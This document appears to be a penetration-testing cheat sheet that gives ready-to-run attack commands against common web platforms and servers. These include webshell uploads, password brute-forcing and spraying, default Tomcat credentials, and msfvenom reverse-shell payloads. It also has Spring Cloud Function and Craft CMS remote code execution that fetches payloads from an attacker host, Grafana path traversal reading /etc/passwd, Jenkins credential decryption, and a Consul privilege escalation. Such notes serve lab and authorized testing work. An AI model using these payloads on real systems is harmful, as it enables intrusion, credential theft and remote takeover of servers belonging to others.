CMS / Servers / Others
00. Webroot
/var/www/html/ # Apache
/usr/local/nginx/html/ # Nginx
c:\inetpub\wwwroot\ # IIS
C:\xampp\htdocs\ # XAMPP
01. Wordpress
Scan
## ------------------| Basic
wpscan -e vt,tt,u,ap --url <URL>
wpscan -e vt,tt,u,ap -o wpscan.log --url <URL>
## ------------------| Plugin detection
wpscan -e ap --plugins-detection aggressive --url <URL>
## ------------------| Default Locations
/wp-content/plugins/akismet/index.php
/wp-content/themes/twentytwenty/404.php
/wp-content/themes/twentytwentyone/404.php
/wp-content/themes/twentytwentytwo/404.php
/wp-content/plugins/revslider/public/index.php
/wp-content/plugins/contact-form-7/wp-contact-form-7.php
Bruteforce password/username
## ------------------| With WPScan
wpscan -U <UserName/List> -P <Password/List> --url <URL>
## ------------------| With WPForce
git clone https://github.com/n00py/WPForce.git && cd WPForce
python2 wpforce.py -w <Password/List> -i <UserName/List> -u <URL>
## ------------------| With WpCrack
wget https://raw.githubusercontent.com/22XploiterCrew-Team/WpCrack/1.x/WpCrack.py
python WpCrack.py -t <URL> --p <Password/List> -u <UserName>
Username/Password
select user_login,user_pass from wp_users;
Webshell
## ------------------| With WPForce
git clone https://github.com/n00py/WPForce.git && cd WPForce
python yertle.py -u "<username>" -p "<password>" -t "<URL>" -i
## Or
## ------------------| Create Plugin
wget https://raw.githubusercontent.com/leonjza/wordpress-shell/master/shell.php
zip -r shell.zip shell.php
## ------------------| Upload to
http://<IP>/wp-admin/plugin-install.php
## ------------------| Execute shell
http://<IP>/wp-content/plugins/shell/shell.php?cmd=id
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"cmd":"uname -a"})')"
## ------------------| Reverse shell (default port:443)
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"ip":"<IP>"})')"
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"ip":"<IP>","port":"4545"})')"
02. Joomla
## ------------------| Identify version
# Navigate to
/administrator/manifest/files/joomla.xml
# Check this tag
<version>3.7.5</version>
## ------------------| Run scan
joomscan -u <URL>
CVE-2023-23752 (Authentication bypass resulting in an information leak)
## ------------------| Affected Versions
Joomla! < 4.2.8
## ------------------| Manual Expo
curl 'http://<IP>/api/index.php/v1/config/application?public=true'
## ------------------| Automated
git clone https://github.com/ThatNotEasy/CVE-2023-23752 && cd CVE-2023-23752
pip3 install -r requirements.txt
python3 joomla.py
03. Drupal
03.1 Enumerations
## ------------------| Username enumeration
### Check if we can register new user (search for "name is already taken")
/user/register
### Check access status
/user/<number>
/user/1
### is 403 --> user exist
### is 404 --> doesn't exist
## ------------------| Hidden pages
wfuzz -c -z range,1-500 --hc 404 http://<IP>/node/FUZZ
03.2 Upload shell
## ------------------| Check "plugin php" status
/modules/php
### if status is 403 --> "plugin php" exists/installed
## ------------------| Install "plugin php"
Modules --> Check for PHP "Filter" --> Save
## ------------------| Upload shell
Add content --> Basic Page/Article --> <paste_shell> --> select "PHP code in Text format" --> Preview
04. Tomcat
## ------------------| Endpoint permissions
/manager/html # <--- roles="manager-gui"
/manager/text/list # <--- roles="manager-script" [If we have /manager, Then we can use curl to upload war file :)]
/host-manager/html # <--- roles="admin-gui"
## ------------------| Path Normalization
/manager/notexsits/..;/html/
/manager/;name=notexsits/html/
/;name=notexsits/manager/ # <--- not work for upload war files
/notexsits/..;/manager/ # <--- not work for upload war files
## Remember to put '/' at the end ^
## ------------------| Common Creds
tomcat:s3cret
tomcat:s3cr3t
admin:s3cr3t
tomcat:tomcat
admin:admin
admin:tomcat
tomcat:Tomcatadm
tomcat:TomcatAdm
tomcat:Tomcatadn
admin:<NOTHING>
## ------------------| Upload paths
/manager/deploy?war=file&path=/shell ## Tomcat6
/manager/text/deploy?path=/shell ## Tomcat7 and above
## ------------------| Upload via curl
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f war > shell.war
curl -u 'username:password' -T shell.war http://<IP>:8080/manager/text/deploy?path=/h4rithd
## ------------------| Manually Upload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f war > shell.war
## Then put the shell.war file to \tomcat\webapps\shell.war directory
## Then use \bin\startup.[sh/bat] file to restart the service and extract the war file.
## Now you can use http://<IP>/shell/
05. Nginx
## ------------------| If code look like this
location /admin {
<--code-->
}
## ------------------| It has LFI; try this
admin../config.php
05. SharePoint / OWA
05.1 SharePoint
## ------------------| Important directories
/_layouts/viewlsts.aspx
05.2 OWA
## ------------------| Setup
git clone https://github.com/byt3bl33d3r/SprayingToolkit
cd SprayingToolkit/
pip3 install -r requirements.txt
## ------------------| Create Usernames List (the default is {f}{last})
python3 spindrift.py users.txt --target <IP> > newuserlist.txt
python3 spindrift.py users.txt --format "{f}.{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}.{last}" --target <IP> >> newuserlist.txts
python3 spindrift.py users.txt --format "{first}.{l}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{l}" --target <IP> >> newuserlist.txt
## ------------------| Bruteforce
python3 atomizer.py owa 10.10.10.210 'Passw0rd' newuserlist.txt --interval 0:00:01
python3 atomizer.py owa 10.10.10.210 /usr/share/seclists/Passwords/probable-v2-top207.txt newuserlist.txt --interval 0:00:01
06. Jenkins
Interesting endpoints
/manage
/script
/credentials
Configaration files
## ------------------| Linux
/var/jenkins_home/config.xml
/var/jenkins_home/users/users.xml
/var/jenkins_home/credentials.xml
/var/jenkins_home/secrets/master.key
/var/jenkins_home/users/admin_*/config.xml
/var/jenkins_home/secrets/hudson.util.Secret
/var/jenkins_home/secrets/initialAdminPassword
/var/lib/jenkins/config.xml
/var/lib/jenkins/users/users.xml
/var/lib/jenkins/credentials.xml
/var/lib/jenkins/secrets/master.key
/var/lib/jenkins/users/admin_*/config.xml
/var/lib/jenkins/secrets/hudson.util.Secret
/var/lib/jenkins/secrets/initialAdminPassword
## ------------------| Windows
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\config.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\credentials.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\users\users.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\users\admin_*\config.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets\master.key
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets\hudson.util.Secret
Reset password [Read full post from here]
## ------------------| Methord I (Reset Password)
## Edit following file
sudo vi /var/lib/jenkins/users/admin_5103638315737262589/config.xml
## Bcrypt password will store under <passwordHash> tag [here i used h4rithd]
<passwordHash>#jbcrypt:$2a$04$gcRUhfwsCQlQKbSTgpFCKOdV9uQuD5/vXwiU1bgULDzW4JB/pNp5S</passwordHash>
## Restart the service
sudo systemctl restart jenkins
## ------------------| Methord II (Decrypt Password using console)
## If you have access to /script then follow below url
## Get password hash from \users\<username>\config.xml
hudson.util.Secret.decrypt '<HASH>'
## ------------------| Methord III (Decrypt Password offline)
## Download following files
/var/jenkins_home/credentials.xml
/var/jenkins_home/secrets/master.key
/var/jenkins_home/secrets/hudson.util.Secret
## Get ssh keys
git clone https://github.com/hoto/jenkins-credentials-decryptor.git && cd jenkins-credentials-decryptor && make build
./bin/jenkins-credentials-decryptor -m master.key -s hudson.util.Secret -c credentials.xml -o text
## Get Password
pip install pycryptodome
CVE-2024-23897 | Jenkins <= 2.441
## ------------------| Manual
wget http://<JENKINS_URL>/jnlpJars/jenkins-cli.jar
java -jar jenkins-cli.jar -s <JENKINS_URL> connect-node '@/etc/passwd'
java -jar jenkins-cli.jar -s <JENKINS_URL> reload-job '@/etc/passwd'
## ------------------| Automate
wget https://www.exploit-db.com/raw/51993 -O expo.py
python3 expo.py -u http://$IP:8080 -p /etc/passwd
Remote Code Execution
Create New Job
Schedule Method
Trigger Remotely Method
## ------------------| Trigger the job
curl "http://[username]:[token]@[host]/job/[job name]/build?token=[token name]"
## Ex: curl "http://h4rithd:[email protected]:8080/job/TestRun/build?token=h4rithdToken"
07. Grafana
Config files
## ------------------|
/etc/grafana/grafana.ini
$WORKING_DIR/conf/defaults.ini
/usr/local/etc/grafana/grafana.ini
Unauthorized reading of files in Grafana [CVE-2021-43798] - videoPOC
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/alertmanager/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashboard/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/grafana/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mixed/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd
08. Consul
echo 'chmod 4755 /bin/dash' > /dev/shm/test.sh
curl --header "X-Consul-Token: <TOKEN-********-****>" --request PUT -d '{"ID": "meow", "Name": "meow", "Address": "127.0.0.1", "Port": 80, "check": {"Args": ["/usr/bin/bash", "/dev/shm/test.sh"], "interval": "10s", "timeout": "1s"}}' http://127.0.0.1:8500/v1/agent/service/register
dash -p
09. Spring Framework
### Spring Boot version 2.6.5
## ------------------| Manual
wget https://raw.githubusercontent.com/sunnyvale-it/CVE-2022-22965-PoC/main/exploit-core.py
python3 exploit-core.py --url http://10.10.11.204:8080/
Spring Cloud Function Vulnerability(CVE-2022-22963)
## ------------------| Manual
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=4545 -f elf > h4rithd.elf
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("curl <IP>/h4rithd.elf -o /tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("chmod +x /tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("/tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'
## ------------------| Metasploit
use exploit/multi/http/spring_cloud_function_spel_injection
10. Craft CMS
## ------------------| Versions between 4.0.0-RC1 – 4.4.14
## Check for phpinfo
curl -sk "https://craftcms-vuln.ddev.site" -x localhost:8080 -X POST -d 'action=conditions/render&configObject[class]=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"\\GuzzleHttp\\Psr7\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}'
## ------------------| RCE Path
## Create h4rithd.msl file
<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="http://attacker_ip:8000/vuln.png" />
<write filename="/var/www/html/web/shell.php" />
</image>
## ------------------| Create the vuln.png
exiftool -comment="<?php phpinfo(); ?>" vuln.png
## ------------------| Expolit
curl -sk "http://surveillance.htb" -x localhost:8080 -X POST -H 'Content-Type: multipart/form-data' -F 'action=conditions/render' -F 'configObject[class]=craft\elements\conditions\ElementCondition' -F 'config={"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/dev/null"}}}' -F '[email protected]'
curl -sk "http://surveillance.htb" -x localhost:8080 -X POST -d 'action=conditions/render&configObject[class]=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"vid:msl:/tmp/php*"}}}'
curl -k "http://surveillance.htb/shell.php" -x localhost:8080 --output -
## ------------------| Metasploit
use exploit exploit/multi/http/cmsms_object_injection_rce
set RHOSTS <IP>
set ForceExploit trueh4rith
exploit
11. Nagios
## ------------------| Authenticate with API
### Create token
curl -ksX POST https://<HOST>/nagiosxi/api/v1/authenticate -d 'username=<USER>&password=<PASS>&valid_min=500'
### Login to the server
https://<HOST>/nagiosxi/?token=<TOKEN>
### Add new user
curl -XPOST --insecure "https://<HOST>/nagiosxi/api/v1/system/user?apikey=<KEY>&pretty=1" -d "username=h4rithd&password=h4rithd&name=h4rithd&email=h4rithd@localhost&auth_level=admin"
### Login using hrithd:h4rithd creds
### Use SQL map to get admin api key
sqlmap -u "https://<HOST>/nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=<AUTH_TOKEN>" --level 5 --risk 3 -p id --batch -D nagiosxi --dump -T xi_users
Last updated